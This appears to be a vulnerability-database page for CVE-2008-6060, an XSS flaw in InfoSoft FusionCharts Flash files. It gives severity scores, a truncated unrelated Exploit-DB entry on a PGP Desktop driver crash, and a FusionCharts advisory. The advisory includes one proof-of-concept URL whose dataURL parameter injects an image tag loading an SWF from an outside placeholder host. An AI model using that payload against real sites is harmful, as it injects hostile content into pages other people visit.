CVE-2008-6060
Published: 2009-02-05
Priority P4 · 21 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.05% (78.9th percentile)
Cross-site scripting (XSS) vulnerability in ActionScript in arbitrary Shockwave Flash (SWF) files created by InfoSoft FusionCharts allows remote attackers to inject arbitrary additional SWF content via a URL in the SRC attribute of an IMG element in the dataURL parameter.
No detection rules found.
Exploit-DB
PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service
exploitdb·2008-12-23
CVE-2008-5731 PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service
---
--------------------------[PGP Desktop 9.0.6 Denial Of Service]--------------->
Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Profile: http://evilcry.netsons.org
Website: http://evilfingers.com/
Release Date: 23/12/2008
+-------------------------------------------------+
Product: PGP Desktop 9.0.6 [Build 6060] (other versions could be affected)
Affected Component: PGPwded.sys
Category: Local Denial of Service (BSOD)
(untested) Local Privilege Escalation
+-------------------------------------------------+
--------------------------[Details]--------------->
PGP Desktop's PGPwded.sys driver does not sanitize user-supplied input (IOCTL)
and this leads to a Driver Collapse that propagates on the syst
Exploit-DB
InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution
exploitdb·2008-01-02
CVE-2008-6060 InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution
---
source: https://www.securityfocus.com/bid/27109/info
InfoSoft FusionCharts is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E
No writeups or analysis indexed.
http://docs.google.com/View?docid=ajfxntc4dmsq_14dt57ssdw
http://www.kb.cert.org/vuls/id/249337
http://www.securityfocus.com/archive/1/485722/100/100/threaded
http://www.securityfocus.com/bid/27109
http://www.vupen.com/english/advisories/2008/0067